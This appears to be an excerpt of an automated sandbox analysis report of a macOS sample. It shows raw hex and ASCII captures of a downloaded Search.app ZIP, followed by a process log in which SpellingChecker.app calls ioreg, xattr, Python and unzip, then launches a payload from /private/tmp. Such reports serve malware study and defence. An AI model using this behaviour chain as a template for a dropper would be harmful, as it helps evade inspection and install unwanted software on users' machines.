              Data Raw: 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 0b 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 14 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 0a 00 00 00 00 00 a7 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 23 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 55 58 0c 00 b3 24 aa 5b 79 24 aa 5b f5 01 14 00 50 4b 03 04 14 00 08 00 08 00 af 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 30 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43 6f 6e 74 65 6e 74 73 2f 5f 43 6f 64 65 53 69 67 6e 61 74 75 72 65 2f 43 6f 64 65 52 65 73 6f 75 72 63 65 73 55 58 0c 00 8a 24 aa 5b 8a 24 aa 5b f5 01 14 00 ed 95 6d 6f da 30 10 c7 5f 97 4f 91 45 7d 01 54 c4 81 b5 1a 9b 78 10 25 45 cb 16 20 6a a8 3a 3a d6 c9 24 2e b8 38 71 e4 38 64 48 f9 f0 73 78 28 e9 44 28 68 5d 5f ed 55 4e f6 dd f9 f7 bf 3b 3b b5 e6 2f 97 48 73 c4 02 4c bd ba 5c 56 54 59 42 9e 4d 1d ec 4d ea f2 cd a0 53 aa ca cd 46 ae f6 4e eb b7 07 43 f3 4a f2 09 0e b8 64 de 5c 1a 7a 5b 92 4b 00 b4 7c 9f 20 00 b4 81 26 99 86 6e 0d 24 91 03 80 ab 9e 2c c9 53 ce fd 4f 00 44 51 a4 c0 c4 4b b1 a9 9b 38 06 c0 64 d4 47 8c 2f 0c 91 ac 24 02 14 87 3b b2 38 66 95 fd 19 8e 58 75 b0 cd 1b b9 93 da 0c 2d 1a 0f 98 a0 a0 06 12 53 ac ac 77 56 5b d7 28 a0 21 b3 51 00 2e 61 80 14 e2 33 fa 08 ba 10 7b 5d e4 85 8a 87 c7 9b 30 11 07 39 4c 8c de 9c f4 be da a1 e1 9e dd 3e 0e e9 87 f3 fe 22 ec 57 2e 54 f2 71 d1 ad 27 7e 60 ed 28 8c 3f 19 2a 7f 0f b1 8e 5b 05 4e 61 30 7d ca 99 42 3c b1 3b 63 f3 b6 1f 5d a8 b6 a6 72 a7 75 1d 79 bd 2f da 7b 43 c7 73 d2 aa de 55 fb d5 ca 9d 33 34 ce 7b 33 4e eb cb c8 0d 74 8a fa 19 3e 0b 33 4b 78 bf c5 df 72 72 16 22 b0 cb 45 29 8e d6 02 b3 44 51 9f 8b 46 42 92 d2 f5 94 6d e5 11 21 3c 99 f2 d4 3e 43 90 34 
ca aa aa d6 c0 d2 4c eb d8 43 40 a8 bd 1e 1b 65 39 44 a7 99 48 2e e6 47 e3 94 0f c3 49 5a fe 52 49 b2 04 97 f7 9c 90 a5 6c 03 bf a3 bf 19 e3 99 14 cc b1 86 dd fc 69 0c 0a 47 22 96 b3 01 f3 4a 11 14 9a 23 45 b3 7e 5a 9c 32 f4 aa d5 af ec 1d 86 7c 87 41 17 45 94 cd 82 d8 9a 42 86 9c d4 82 49 c2 89 ee ad be 25 2c 8c 6f 66 db 42 6c 8e 45 b7 e2 cf 88 88 47 28 88 bb d0 ee 5b b1 81 c7 0c b2 05 c8 b7 42 4e 5d 28 54 c4 96 4f 39 49 88 62 83 4e b0 a7 73 e4 06 85 42 66 67 3d 14 70 e4 1c 3f ea d9 da 94 62 e6 2d d4 bd 07 3a fa 07 a3 5e d9 83 63 ce 26 c9 b1 6f 76 de ae c7 e8 90 49 3d 2c e7 ff d7 eb 8d 5e af ef f7 e0 c7 59 a6 a2 d7 bf 35 c8 1d 23 c7 41 8e b8 1e 8c ce 71 52 55 61
              Data Ascii: PKp9MSearch.app/UX$[y$[PKp9MSearch.app/Contents/UX$[y$[PKp9M#Search.app/Contents/_CodeSignature/UX$[y$[PKp9M0Search.app/Contents/_CodeSignature/CodeResourcesUX$[$[mo0_OE}Tx%E j::$.8q8dHsx(D(h]_UN;;/HsL\VTYBMMSFNCJd\z[K| &n$,SODQK8dG/$;8fXu-SwV[(!Q.a3{]09L>"W.Tq'~`(?*[Na0}B<;c]ruy/{CsU34{3Nt>3Kxrr"E)DQFBm!<>C4LC@e9DH.GIZRIliG"J#E~Z2|AEBI%,ofBlEG([BN](TO9IbNsBfg=p?b-:^c&ovI=,^Y5#AqRUa
              Timestamp:Okt 3, 2018 14:12:21.175589085 MESZ
              kBytes transferred:9
              Direction:IN
              Data Raw: 24 3f ed 4c 88 e3 e7 68 dd ae 97 ae e0 11 89 37 c6 f6 bb 4c dd c8 fd 06 50 4b 07 08 61 73 ff 21 60 02 00 00 a4 09 00 00 50 4b 03 04 0a 00 00 00 00 00 b0 70 39 4d 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 10 00 53 65 61 72 63 68 2e 61 70 70 2f 43
              Data Ascii: $?Lh7LPKas!`PKp9MSearch.app/Contents/MacOS/UX$[$[PKp9M Search.app/Contents/MacOS/SearchUX$[$[@TMDY\P\EQEeAdsKay03#KY
              Timestamp:Okt 3, 2018 14:12:21.175760031 MESZ
              kBytes transferred:10
              Direction:IN
              Data Raw: 8b 40 8b 83 1e d3 de 38 a5 c1 5e 13 09 14 47 fb c1 e7 db 47 34 cd e9 31 fd 98 c0 16 38 e0 1b 47 71 94 6f 3e 5f 5e 8f 0e 20 6f b0 a8 05 be a3 35 46 b5 02 f7 da be cc 56 3c e5 1f 65 a3 8f cb 44 ff dc d8 c3 1f 9a e1 21 71 21 60 05 ca 02 fe b8 f1 eb
              Data Ascii: @8^GG418Gqo>_^ o5FV<eD!q!`6^v#"kz%=%htl}i{/qJS`kODtQKwXab2CqhH/ov@ZiXe,?>|?MH4%L6MT`
              Timestamp:Okt 3, 2018 14:12:21.175872087 MESZ
              kBytes transferred:11
              Direction:IN
              Data Raw: aa 42 34 6a d2 9a 5d f9 a8 ce 89 dd ee d8 68 9b cc dd 51 23 35 4f 07 d1 11 85 b9 74 0c 5f 1b f1 b5 01 5f b7 e3 eb 16 44 72 55 3a 7f 3f 9a 23 bc b9 e4 11 4e 47 0c 37 8f 19 9b bf 08 c3 53 d4 bc 1f 52 ef 36 68 92 49 6b 46 07 49 4d 63 82 a4 07 46 07
              Data Ascii: B4j]hQ#5Ot__DrU:?#NG7SR6hIkFIMcFB)<)OV83JM0$+ZDR%W#aA3pMX>Fyex0%j6`)_anVa)#W"Vsxv<B`=0 4Ck`RaM*"zV
              Timestamp:Okt 3, 2018 14:12:21.175980091 MESZ
              kBytes transferred:13
              Direction:IN
              Data Raw: a8 1d d2 dd 83 fe 28 1b 13 58 43 e2 c6 c5 d8 0a 34 d8 e3 f9 af 9e 86 9a 41 41 eb 77 88 d4 84 c5 48 aa 07 13 ea 84 ad c5 f3 19 44 57 9b 03 92 78 48 4d f1 30 9a 31 fe 84 4f 1a b4 bd 03 1d 3f 92 4d 94 39 6d 00 37 72 23 4c b8 85 41 72 a4 b2 06 1c 87
              Data Ascii: (XC4AAwHDWxHM01O?M9m7r#LArD`b,VK0,r9`nD&ti$m8;Q@iAHMhq\*w5q/>mvL9?\0Yb"JHh8&Cvn
              Timestamp:Okt 3, 2018 14:12:21.176088095 MESZ
              kBytes transferred:14
              Direction:IN
              Data Raw: 16 09 88 ab e0 a6 99 6b 9b 5c db a0 df 8f 6f 6c c7 7a d9 51 91 8d bd 65 f7 e2 4c 29 da 02 8b ed c5 ad 38 c7 00 de de 02 0f c2 b4 9f 5b ed b0 73 2f ce 30 a3 09 c0 0d d7 4c 6a a4 d5 00 f2 87 18 eb 70 37 ba 93 8a 76 fb 77 c5 d8 32 fd f0 b8 5e 13 73
              Data Ascii: k\olzQeL)8[s/0Ljp7vw2^s#}VYQi?sv>QLLLP_bb8Tss-VNv^F9hX0;9Cw1o>zO??4MON{_I'gr 8-m,kw&
              Timestamp:Okt 3, 2018 14:12:21.176201105 MESZ
              kBytes transferred:15
              Direction:IN
              Data Raw: d3 2a c1 07 2e e3 fc 0a bd 43 5c 99 71 0c 63 8c 9b 35 0a f2 9e 7f 8d 85 7c e4 ac c1 b0 4f f0 9f 08 f0 6b 89 e8 5e 15 2c 1a 85 de fd 93 8e a1 4b 03 2a dd f6 9e e4 ba 03 48 bd 27 7c 7b db 7b f2 99 6b 3d 44 68 1d f6 f1 ed 3f 0e 51 87 b8 ee 42 6c 3a
              Data Ascii: *.C\qc5|Ok^,K*H'|{{k=Dh?QBl:X":,wsm@|(]s!Q.gy!J1(8-*p*o;1uHQd(t"QQD(@Dq<#XZ\+<`A#pe?
              Timestamp:Okt 3, 2018 14:12:21.176309109 MESZ
              kBytes transferred:16
              Direction:IN
              Data Raw: 4a 38 8a 8c e5 32 51 5c 38 99 95 68 1b 4e de 17 84 93 be 3e cd 8f 6e 26 e2 28 71 52 22 f5 71 31 17 b4 78 a4 cc 6a 7c 56 1c 96 68 b9 1f d9 d7 07 23 bc b5 d8 63 34 e0 7b 15 53 8f 91 a7 be 10 de 8d e0 ef 69 c8 71 0d 1e 11 8c f8 c5 1b cf a7 d4 85 97
              Data Ascii: J82Q\8hN>n&(qR"q1xj|Vh#c4{SiqD: Y$n[(v;drsAX14d`7VMcTI(X7@QjK"' PLWR}1TO(o@\=7>%J4M
              Timestamp:Okt 3, 2018 14:12:21.176417112 MESZ
              kBytes transferred:17
              Direction:IN
              Data Raw: 20 56 db 37 b5 52 05 a8 27 37 c9 6a b0 a8 12 7a 7e 8d 56 ba de 8a 67 48 a0 a2 4b c3 d1 e0 fd 8d 54 02 2a 3a 35 dc aa 22 50 0e 1d 78 e8 74 cc 27 85 7c 73 dc d0 ca da b9 9a c8 f7 8a a8 42 4e f1 0c d1 42 5b d1 4a 38 1b b1 1e 6e ce eb 47 68 6b 4a c9
              Data Ascii: V7R'7jz~VgHKT*:5"Pxt'|sBNB[J8nGhkJDNDONOX|NHBwmB`5D[-JW1\@x~Z7N(ta5gR2J7228b>GIo{On2T(F[v{>
              Timestamp:Okt 3, 2018 14:12:21.176531076 MESZ
              kBytes transferred:19
              Direction:IN
              Data Raw: e4 e4 28 77 03 e5 d0 0b 35 ae fd 88 72 11 28 77 06 e5 c6 a3 dc 11 4c 87 72 fb 51 6e 1e ca ed 44 b9 17 50 6e 0b ca 7d 84 72 6f a0 dc 19 94 7b 19 e5 d0 f9 cf b5 e7 51 ae 2d 92 7e 31 ca f5 41 b9 79 28 17 83 72 06 94 cb 41 b9 e9 28 37 17 e5 f2 51 ee
              Data Ascii: (w5r(wLrQnDPn}ro{Q-~1Ay(rA(7QUS&ZjKUdb'YD^?B58LZi`!EfT3dhTKYAKYZ!)`J4hF33eJCT%[+U=2QXut29j[4
              Timestamp:Okt 3, 2018 14:12:21.201268911 MESZ
              kBytes transferred:20
              Direction:IN
              Data Raw: 45 ea 25 39 24 d8 9c 4a 95 a1 d1 2b f1 42 59 cc b2 86 68 23 5a dd 32 79 c2 45 eb 31 ef 0c 8d 36 47 9b a8 91 e3 b5 19 4d 89 54 98 40 02 9a 44 9d ac 88 23 c1 3a 2a 43 3e ba 50 07 52 21 e3 b6 4e 7d 9b f6 a1 83 a3 8d 2a 15 f1 25 d4 1d f0 95 d0 9c 28
              Data Ascii: E%9$J+BYh#Z2yE16GMT@D#:*C>PR!N}*%(L}YYQokOBZF"d:CVbfHfR1ZT5m.D"6lx>jHJgZ3[|6DlodI*T(Q4kK3+h'Q(@d$k2;


              System Behavior

              General

              Start time:14:12:18
              Start date:03/10/2018
              Path:/usr/libexec/xpcproxy
              File size:43488 bytes
              MD5 hash:d1bb9a4899f0af921e8188218b20d744

              General

              Start time:14:12:18
              Start date:03/10/2018
              Path:/Users/henry/Desktop/unpack/SpellingChecker.app/Contents/MacOS/SpellingChecker
              File size:154224 bytes
              MD5 hash:0194c31984d1501bf9835c0d4d48cbbf

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/sbin/ioreg
              File size:45040 bytes
              MD5 hash:c728ee7d6c0e4941de5ab855a856f473

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/bin/grep
              File size:33936 bytes
              MD5 hash:2b3efb273296881708ea2914c612e0eb

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:19
              Start date:03/10/2018
              Path:/usr/bin/wc
              File size:23072 bytes
              MD5 hash:b89949ce6a1929257e5c0c157027cbfe

              General

              Start time:14:12:20
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              General

              Start time:14:12:20
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/unzip
              File size:186048 bytes
              MD5 hash:f598378ec162f3480d71dc44cc07243c

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/usr/bin/xattr
              File size:925 bytes
              MD5 hash:e2ca6555fe4b8c6a97d1ced2156c9b69

              General

              Start time:14:12:22
              Start date:03/10/2018
              Path:/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python
              File size:51744 bytes
              MD5 hash:ba780ab677147d9db60c564ef3f51dd0

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/bin/open
              File size:105952 bytes
              MD5 hash:40ed6d8f35c9f20484b97582d296398f

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/libexec/xpcproxy
              File size:43488 bytes
              MD5 hash:d1bb9a4899f0af921e8188218b20d744

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/private/tmp/Search.app/Contents/MacOS/Search
              File size:70384 bytes
              MD5 hash:964bacf4c598811008b7b6379945eb8a

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/bin/sh
              File size:618512 bytes
              MD5 hash:8aa60b22a5d30418a002b340989384dc

              General

              Start time:14:12:23
              Start date:03/10/2018
              Path:/usr/bin/defaults
              File size:39472 bytes
              MD5 hash:831678c94c2d9c647bf3d283b1861bda